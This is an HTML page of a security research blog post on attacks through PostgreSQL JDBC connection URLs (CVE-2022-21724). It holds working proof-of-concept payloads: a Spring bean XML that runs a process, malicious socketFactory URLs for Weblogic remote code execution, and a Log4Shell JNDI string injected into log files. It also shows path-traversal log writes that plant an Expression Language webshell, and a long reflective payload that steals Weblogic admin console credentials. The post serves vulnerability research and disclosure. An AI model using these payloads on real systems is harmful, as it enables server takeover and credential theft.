<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="0x01 ForewordsI made a presentation about JDBC attack interface at HITB Singapore security conference in 2021.  The title of this talk is &lt;Make JDBC Attacks Brilliant Again&gt; , if you are interes">
<meta property="og:type" content="article">
<meta property="og:title" content="Make JDBC Attacks Brilliant Again II">
<meta property="og:url" content="http://yoursite.com/2022/06/02/Make-JDBC-Attacks-Brilliant-Again/index.html">
<meta property="og:site_name">
<meta property="og:description" content="0x01 ForewordsI made a presentation about JDBC attack interface at HITB Singapore security conference in 2021.  The title of this talk is &lt;Make JDBC Attacks Brilliant Again&gt; , if you are interes">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://yoursite.com/images/pasted-108.png">
<meta property="og:image" content="http://yoursite.com/images/pasted-109.png">
<meta property="og:image" content="http://yoursite.com/images/pasted-110.png">
<meta property="og:image" content="http://yoursite.com/images/pasted-111.png">
<meta property="og:image" content="http://yoursite.com/images/pasted-112.png">
<meta property="og:image" content="http://yoursite.com/images/pasted-113.png">
<meta property="og:image" content="http://yoursite.com/images/pasted-114.png">
<meta property="og:image" content="http://yoursite.com/images/pasted-115.png">
<meta property="og:image" content="http://yoursite.com/images/pasted-116.png">
<meta property="og:image" content="http://yoursite.com/images/pasted-117.png">
<meta property="og:image" content="http://yoursite.com/images/pasted-118.png">
<meta property="og:image" content="http://yoursite.com/images/pasted-119.png">
<meta property="og:image" content="http://yoursite.com/images/pasted-121.png">
<meta property="og:image" content="http://yoursite.com/images/pasted-122.png">
<meta property="og:image" content="http://yoursite.com/images/pasted-123.png">
<meta property="og:image" content="http://yoursite.com/images/pasted-124.png">
<meta property="og:image" content="http://yoursite.com/images/pasted-125.png">
<meta property="og:image" content="http://yoursite.com/images/pasted-126.png">
<meta property="og:image" content="http://yoursite.com/images/pasted-127.png">
<meta property="og:image" content="http://yoursite.com/images/pasted-128.png">
<meta property="og:image" content="http://yoursite.com/images/pasted-129.png">
<meta property="article:published_time" content="2022-06-02T02:57:00.000Z">
<meta property="article:modified_time" content="2022-10-12T03:04:30.909Z">
<meta property="article:author" content="by pyn3rd">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://yoursite.com/images/pasted-108.png">
<meta name="twitter:creator" content="@pyn3rd">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>Make JDBC Attacks Brilliant Again II</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 5.4.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/archives/">Archives</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2022/06/06/Make-JDBC-Attacks-Brillian-Again-I/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2022/05/07/Arbitrary-File-Upload-Tricks-In-Java/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://yoursite.com/2022/06/02/Make-JDBC-Attacks-Brilliant-Again/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://yoursite.com/2022/06/02/Make-JDBC-Attacks-Brilliant-Again/&text=Make JDBC Attacks Brilliant Again II"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://yoursite.com/2022/06/02/Make-JDBC-Attacks-Brilliant-Again/&title=Make JDBC Attacks Brilliant Again II"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://yoursite.com/2022/06/02/Make-JDBC-Attacks-Brilliant-Again/&is_video=false&description=Make JDBC Attacks Brilliant Again II"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Make JDBC Attacks Brilliant Again II&body=Check out this article: http://yoursite.com/2022/06/02/Make-JDBC-Attacks-Brilliant-Again/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://yoursite.com/2022/06/02/Make-JDBC-Attacks-Brilliant-Again/&title=Make JDBC Attacks Brilliant Again II"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://yoursite.com/2022/06/02/Make-JDBC-Attacks-Brilliant-Again/&title=Make JDBC Attacks Brilliant Again II"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://yoursite.com/2022/06/02/Make-JDBC-Attacks-Brilliant-Again/&title=Make JDBC Attacks Brilliant Again II"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://yoursite.com/2022/06/02/Make-JDBC-Attacks-Brilliant-Again/&title=Make JDBC Attacks Brilliant Again II"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://yoursite.com/2022/06/02/Make-JDBC-Attacks-Brilliant-Again/&name=Make JDBC Attacks Brilliant Again II&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=http://yoursite.com/2022/06/02/Make-JDBC-Attacks-Brilliant-Again/&t=Make JDBC Attacks Brilliant Again II"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-5"><a class="toc-link" href="#0x01-Forewords"><span class="toc-number">1.</span> <span class="toc-text">0x01 Forewords</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#0x02-PostgreSQL-JDBC-Driver-Remote-Code-Execution%EF%BC%88CVE-2022-21724%EF%BC%89"><span class="toc-number">2.</span> <span class="toc-text">0x02 PostgreSQL JDBC Driver Remote Code Execution（CVE-2022-21724）</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#0x03-PostgreSQL-JDBC-Driver-arbitrary-file-write"><span class="toc-number">3.</span> <span class="toc-text">0x03 PostgreSQL JDBC Driver arbitrary file write</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#0x04-Conclusion"><span class="toc-number">4.</span> <span class="toc-text">0x04 Conclusion</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        Make JDBC Attacks Brilliant Again II
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">pyn3rd</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2022-06-02T02:57:00.000Z" itemprop="datePublished">2022-06-02</time>
        
        (Updated: <time datetime="2022-10-12T03:04:30.909Z" itemprop="dateModified">2022-10-12</time>)
        
      
    </div>


      

      

    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h5 id="0x01-Forewords"><a href="#0x01-Forewords" class="headerlink" title="0x01 Forewords"></a>0x01 Forewords</h5><p>I made a presentation about JDBC attack interface at HITB Singapore security conference in 2021. </p>
<p>The title of this talk is <code>&lt;Make JDBC Attacks Brilliant Again&gt;</code> , if you are interested, the slide link is as follow</p>
<p><a href="https://conference.hitb.org/files/hitbsecconf2021sin/materials/D1T2%20-%20Make%20JDBC%20Attacks%20Brilliant%20Again%20-%20Xu%20Yuanzhen%20&amp;%20Chen%20Hongkun.pdf">https://conference.hitb.org/files/hitbsecconf2021sin/materials/D1T2%20-%20Make%20JDBC%20Attacks%20Brilliant%20Again%20-%20Xu%20Yuanzhen%20&amp;%20Chen%20Hongkun.pdf</a></p>
<p>However PostgreSQL database was not included in that presentation, and recently JDBC attacks in PostgreSQL database is mentioned. So I make a capsule write-up , I consider it is the exta chapter of <code>&lt;Make JDBC Attacks Brilliant Again&gt;</code>.</p>
<h5 id="0x02-PostgreSQL-JDBC-Driver-Remote-Code-Execution（CVE-2022-21724）"><a href="#0x02-PostgreSQL-JDBC-Driver-Remote-Code-Execution（CVE-2022-21724）" class="headerlink" title="0x02 PostgreSQL JDBC Driver Remote Code Execution（CVE-2022-21724）"></a>0x02 PostgreSQL JDBC Driver Remote Code Execution（CVE-2022-21724）</h5><p>Just like other JDBC drivers, PostgreSQL JDBC driver is on supportive of many properties. Let me start with the pair of properties in <code>CVE-2022-21724</code></p>
<p><strong>a. socketFactory / socketFactoryArg</strong></p>
<p>Official document introduction</p>
<p><img src="/images/pasted-108.png" alt="upload successful"></p>
<p>As always, debug and figure out the internal function calling procedure, here, my PostgreSQL driver version is 42.3.1, I write the following code in order to print version.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">System.out.println(&quot;PostgreSQL Driver Version: &quot; + org.postgresql.Driver.class.getPackage().getImplementationVersion());</span><br></pre></td></tr></table></figure>

<p>Set the property empty and execute the code, it throws exceptions.</p>
<p><img src="/images/pasted-109.png" alt="upload successful"></p>
<p>Refer to the exceptions, set tne breakpoint at <code>getSocketFactory()</code></p>
<p><img src="/images/pasted-110.png" alt="upload successful"></p>
<p>Then step into <code>ObjectFactory.instantiate()</code></p>
<p><img src="/images/pasted-111.png" alt="upload successful"></p>
<p>According to this, we figure out <code>socketFactory</code> is used to initialize objects and there is only one string type argument of the constructor.</p>
<p>Therefore we only need to look for an eligible class, it reminds me of the couple of classes as follow </p>
<ul>
<li><p>org.springframework.context.support.ClassPathXmlApplicationContext</p>
</li>
<li><p>org.springframework.context.support.FileSystemXmlApplicationContext</p>
</li>
</ul>
<p>We can load the following XML file by one of the above classes</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot; ?&gt;</span><br><span class="line">    &lt;beans xmlns=&quot;http://www.springframework.org/schema/beans&quot;</span><br><span class="line">       xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot;</span><br><span class="line">       xsi:schemaLocation=&quot;</span><br><span class="line">     http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd&quot;&gt;</span><br><span class="line">        &lt;bean id=&quot;pb&quot; class=&quot;java.lang.ProcessBuilder&quot; init-method=&quot;start&quot;&gt;</span><br><span class="line">            &lt;constructor-arg &gt;</span><br><span class="line">            &lt;list&gt;</span><br><span class="line">                &lt;value&gt;open&lt;/value&gt;</span><br><span class="line">                &lt;value&gt;-a&lt;/value&gt;</span><br><span class="line">                &lt;value&gt;calculator&lt;/value&gt;</span><br><span class="line">            &lt;/list&gt;</span><br><span class="line">            &lt;/constructor-arg&gt;</span><br><span class="line">        &lt;/bean&gt;</span><br><span class="line">    &lt;/beans&gt;</span><br></pre></td></tr></table></figure>

<p>Start a ftp server</p>
<p><code>python3 -m pyftpdlib -d .</code></p>
<p>Check the result</p>
<p><img src="/images/pasted-112.png" alt="upload successful"></p>
<p>Maybe it also reminds someone of another class, like  <code>java.io.FileOutputStream</code>. Utilize the class and <code>../../</code> to archive traveral path and empty an file arbitrarily. In my illustation, I create an empty file named <code>test.log</code>.</p>
<p><img src="/images/pasted-113.png" alt="upload successful"></p>
<p><strong>b. sslFactory / sslFactoryArg</strong></p>
<p>Official document introduction</p>
<p><img src="/images/pasted-114.png" alt="upload successful"></p>
<p>Actually, they are as similar as <code>socketFactory/socketFactoryArg</code>, only a little differencs, the couple of properties are utilized to judge whether it is an encrypted connection with a SSL handshake.<br>About SSL handshake judgement, we can figure out if the recieved request starting with big letter <code>S</code> after establishing connection, it is on supportive of SSL protocol.</p>
<p>Then step into <code>SSLSocketFactory()</code></p>
<p><img src="/images/pasted-115.png" alt="upload successful"></p>
<p>Next step, focus on <code>SSLSocketFactory</code></p>
<p><img src="/images/pasted-116.png" alt="upload successful"></p>
<p><img src="/images/pasted-117.png" alt="upload successful"></p>
<p>From here on, the code logic is the same as before.To avoid repetition, it’s not described in this article.Consequently we only give a response with big letter <code>S</code> after establishing connection, it will be trigged successfully.</p>
<p><img src="/images/pasted-118.png" alt="upload successful"></p>
<p><strong>c. Weblogic Server Remote Code Execution</strong></p>
<p>I mentioned this class <code>org.springframework.context.support.FileSystemXmlApplicationContext </code> in the above illustration.But in Weblogic Server, there is a similar class <code>com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext</code></p>
<p>Pay attention to check these two jar files as follow</p>
<p><img src="/images/pasted-119.png" alt="upload successful"></p>
<p>They are both necessary, fortunately built-in by default.</p>
<p>Finnally construct the PoC</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">jdbc:postgresql://127.0.0.1:5432/testdb?&amp;socketFactory=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext&amp;socketFactoryArg=ftp://127.0.0.1:2121/bean.xml</span><br></pre></td></tr></table></figure>

<p>Check the result</p>
<p><img src="/images/pasted-121.png" alt="upload successful"></p>
<h5 id="0x03-PostgreSQL-JDBC-Driver-arbitrary-file-write"><a href="#0x03-PostgreSQL-JDBC-Driver-arbitrary-file-write" class="headerlink" title="0x03 PostgreSQL JDBC Driver arbitrary file write"></a>0x03 PostgreSQL JDBC Driver arbitrary file write</h5><p><strong>a. loggerLevel / loggerFile</strong></p>
<p>Official document introduction</p>
<p><img src="/images/pasted-122.png" alt="upload successful"></p>
<p>So PoC can be contructed like this</p>
<p><code>jdbc:postgresql://localhost:5432/testdb?loggerLevel=TRACE&amp;loggerFile=pgjdbc.log </code></p>
<p><strong>b. Log4Shell Logger Injection</strong></p>
<p>Apparently even though the database connection is failed, all the logs will be written into the specific log file. In order to pollute the log file, we can insert <code>Log4Shell</code> payload into JDBC connection URL.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">jdbc:postgresql://localhost:5432/$&#123;jndi:ldap://127.0.0.1:1389/eajmgl&#125;?loggerLevel=TRACE&amp;loggerFile=pgjdbc.log</span><br></pre></td></tr></table></figure>

<p><img src="/images/pasted-123.png" alt="upload successful"></p>
<p>When using Apache Log4j2 library to read polluted log file, RCE will be triggered. </p>
<p><img src="/images/pasted-124.png" alt="upload successful"></p>
<p><strong>c. Weblogic Server Concise Webshell</strong></p>
<p>In order to check the result easily, I use another property <code>ApplicationName</code>. Honestly it’s not necessary.</p>
<p><img src="/images/pasted-125.png" alt="upload successful"></p>
<p>Try to create a Webshell with a line of concise JSP code. The target directory is<code>../../../wlserver/server/lib/consoleapp/webapp/framework/skins/wlsconsole/images/</code></p>
<p>The preliminary payload seems like this </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">jdbc:postgresql://127.0.0.1:5432/testdb?ApplicationName=&lt;%Runtime.getRuntime().exec(&quot;open -a calculator&quot;)&#125;;%&gt;&amp;loggerLevel=TRACE&amp;loggerFile=../../../wlserver/server/lib/consoleapp/webapp/framework/skins/wlsconsole/images/she11.jsp</span><br></pre></td></tr></table></figure>

<p>Unfortunately it throws exceptions directly, Weblogic Server will decode <code>%Ru</code> (<code>%</code> and the next two characters <code>Ru</code>) with  <code>URLDecoder()</code> method,the exception is as follow</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Could not establish a connection because of java.lang.IllegalArgumentException: URLDecoder: Illegal hex characters in escape (%) pattern - For input string: &quot;Ru&quot;&lt;br/&gt;</span><br></pre></td></tr></table></figure>

<p><img src="/images/pasted-126.png" alt="upload successful"></p>
<p>Suddenly Expression Language comes to my mind, it can replace JSP to avoid decoding <code>%</code> exceptionally. By the way, Servlet &lt;=2.3 is not supportive of Expression Language by default.It’s necessary to make sure the Weblogic Server built-in Servlet version. In my illustration, Weblogic Server14 with its built-in Servlet 4.0. Servlet &gt; 2.3  is supportive of Expression Language by default.</p>
<p><img src="/images/pasted-127.png" alt="upload successful"></p>
<p>Everything is ready. The final PoC like this</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">jdbc:postgresql://127.0.0.1:5432/testdb?ApplicationName=$&#123;Runtime.getRuntime().exec(&quot;open -a calculator&quot;)&#125;&amp;loggerLevel=TRACE&amp;loggerFile=../../../wlserver/server/lib/consoleapp/webapp/framework/skins/wlsconsole/images/calc.jsp</span><br></pre></td></tr></table></figure>

<p>Access Webshell URL, then the calculator pops up.</p>
<p><img src="/images/pasted-128.png" alt="upload successful"></p>
<p><strong>d. Weblogic Server Console Password Stealing Webshell</strong></p>
<p>In the above illustration, I replace JSP with Expression Language successfully, but Expression Language is limited, for example, value cannot be assigned to a variable.</p>
<p>As we know,the Expression Language defines a set of implicit objects,like  <code>pageContext</code>, it’s pretty useful.</p>
<p>When instantiating the class <code>javax.servlet.jsp.PageContext</code>, we create an object <code>pageContext</code>, it represnets the entire JSP page. </p>
<p>Set attribute with <code>pageContext.setAttribute()</code> method and get attribute with <code>pageContext.getAttribute()</code>. If the page scope is not appointed，the order will be  <code>page → request → session → application</code>. Page scope is the default, and the <code>pageContext</code> object belongs to page scope.</p>
<p>If you know about the above acknowledge, using Java reflection can achieve the desired effect. So the final PoC like this</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">jdbc:postgresql://127.0.0.1:5432/testdb?ApplicationName=$&#123;pageContext.setAttribute(&quot;classLoader&quot;,Thread.currentThread().getContextClassLoader());pageContext.setAttribute(&quot;httpDataTransferHandler&quot;,pageContext.getAttribute(&quot;classLoader&quot;).loadClass(&quot;weblogic.deploy.service.datatransferhandlers.HttpDataTransferHandler&quot;));pageContext.setAttribute(&quot;managementService&quot;, pageContext.getAttribute(&quot;classLoader&quot;).loadClass(&quot;weblogic.management.provider.ManagementService&quot;));pageContext.setAttribute(&quot;authenticatedSubject&quot;,pageContext.getAttribute(&quot;classLoader&quot;).loadClass(&quot;weblogic.security.acl.internal.AuthenticatedSubject&quot;));pageContext.setAttribute(&quot;propertyService&quot;,pageContext.getAttribute(&quot;classLoader&quot;).loadClass(&quot;weblogic.management.provider.PropertyService&quot;));pageContext.setAttribute(&quot;KERNE_ID&quot;,pageContext.getAttribute(&quot;httpDataTransferHandler&quot;).getDeclaredField(&quot;KERNE_ID&quot;));pageContext.getAttribute(&quot;KERNE_ID&quot;).setAccessible(true);pageContext.setAttribute(&quot;getPropertyService&quot;,managementService.getMethod(&quot;getPropertyService&quot;,pageContext.getAttribute(&quot;authenticatedSubject&quot;)));pageContext.getAttribute(&quot;getPropertyService&quot;).setAccessible(true);pageContext.setAttribute(&quot;prop&quot;,pageContext.getAttribute(&quot;getPropertyService&quot;).invoke(null,pageContext.getAttribute(&quot;KERNE_ID&quot;).get((null))));pageContext.setAttribute(&quot;getTimestamp1&quot;,propertyService.getMethod(&quot;getTimestamp1&quot;));pageContext.getAttribute(&quot;getTimestamp1&quot;).setAccessible(true);pageContext.setAttribute(&quot;getTimestamp2&quot;,propertyService.getMethod(&quot;getTimestamp2&quot;));pageContext.getAttribute(&quot;getTimestamp2&quot;).setAccessible(true);pageContext.setAttribute(&quot;username&quot;, pageContext.getAttribute(&quot;getTimestamp1&quot;).invoke(pageContext.getAttribute(&quot;prop&quot;)));pageContext.setAttribute(&quot;password&quot;,pageContext.getAttribute(&quot;getTimestamp2&quot;).invoke(pageContext.getAttribute(&quot;prop&quot;)));pageContext.getAttribute(&quot;username&quot;).concat(&quot;/&quot;).concat(pageContext.getAttribute(&quot;password&quot;))&#125;&amp;loggerLevel=TRACE&amp;loggerFile=../../../wlserver/server/lib/consoleapp/webapp/framework/skins/wlsconsole/images/passwd.jsp</span><br></pre></td></tr></table></figure>

<p>At last, access the Webshell which we create. Steal the username and password successfully, they are log-in credentials of Weblogic Server administration console.</p>
<p><img src="/images/pasted-129.png" alt="upload successful"></p>
<h5 id="0x04-Conclusion"><a href="#0x04-Conclusion" class="headerlink" title="0x04 Conclusion"></a>0x04 Conclusion</h5><p>JDBC is widely used because of the Java language.So the attack interface of JDBC makes a great impact. One scenario is cloud computing platform, the users can configure their JDBC connections of a cloud database service.The other scenario is authorization bypass weakness in Java frameworks.Both the scenarios make JDBC connection URL controllable easily.</p>
<p>I summarize my research as a write-up and hope someone insterested with the attack interface will follow my research and keep on making JDBC attacks brilliant again!</p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Archives</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-5"><a class="toc-link" href="#0x01-Forewords"><span class="toc-number">1.</span> <span class="toc-text">0x01 Forewords</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#0x02-PostgreSQL-JDBC-Driver-Remote-Code-Execution%EF%BC%88CVE-2022-21724%EF%BC%89"><span class="toc-number">2.</span> <span class="toc-text">0x02 PostgreSQL JDBC Driver Remote Code Execution（CVE-2022-21724）</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#0x03-PostgreSQL-JDBC-Driver-arbitrary-file-write"><span class="toc-number">3.</span> <span class="toc-text">0x03 PostgreSQL JDBC Driver arbitrary file write</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#0x04-Conclusion"><span class="toc-number">4.</span> <span class="toc-text">0x04 Conclusion</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://yoursite.com/2022/06/02/Make-JDBC-Attacks-Brilliant-Again/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://yoursite.com/2022/06/02/Make-JDBC-Attacks-Brilliant-Again/&text=Make JDBC Attacks Brilliant Again II"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://yoursite.com/2022/06/02/Make-JDBC-Attacks-Brilliant-Again/&title=Make JDBC Attacks Brilliant Again II"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://yoursite.com/2022/06/02/Make-JDBC-Attacks-Brilliant-Again/&is_video=false&description=Make JDBC Attacks Brilliant Again II"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Make JDBC Attacks Brilliant Again II&body=Check out this article: http://yoursite.com/2022/06/02/Make-JDBC-Attacks-Brilliant-Again/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://yoursite.com/2022/06/02/Make-JDBC-Attacks-Brilliant-Again/&title=Make JDBC Attacks Brilliant Again II"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://yoursite.com/2022/06/02/Make-JDBC-Attacks-Brilliant-Again/&title=Make JDBC Attacks Brilliant Again II"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://yoursite.com/2022/06/02/Make-JDBC-Attacks-Brilliant-Again/&title=Make JDBC Attacks Brilliant Again II"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://yoursite.com/2022/06/02/Make-JDBC-Attacks-Brilliant-Again/&title=Make JDBC Attacks Brilliant Again II"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://yoursite.com/2022/06/02/Make-JDBC-Attacks-Brilliant-Again/&name=Make JDBC Attacks Brilliant Again II&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=http://yoursite.com/2022/06/02/Make-JDBC-Attacks-Brilliant-Again/&t=Make JDBC Attacks Brilliant Again II"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2022
    by pyn3rd
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/archives/">Archives</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.2/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->
 
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script> 




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
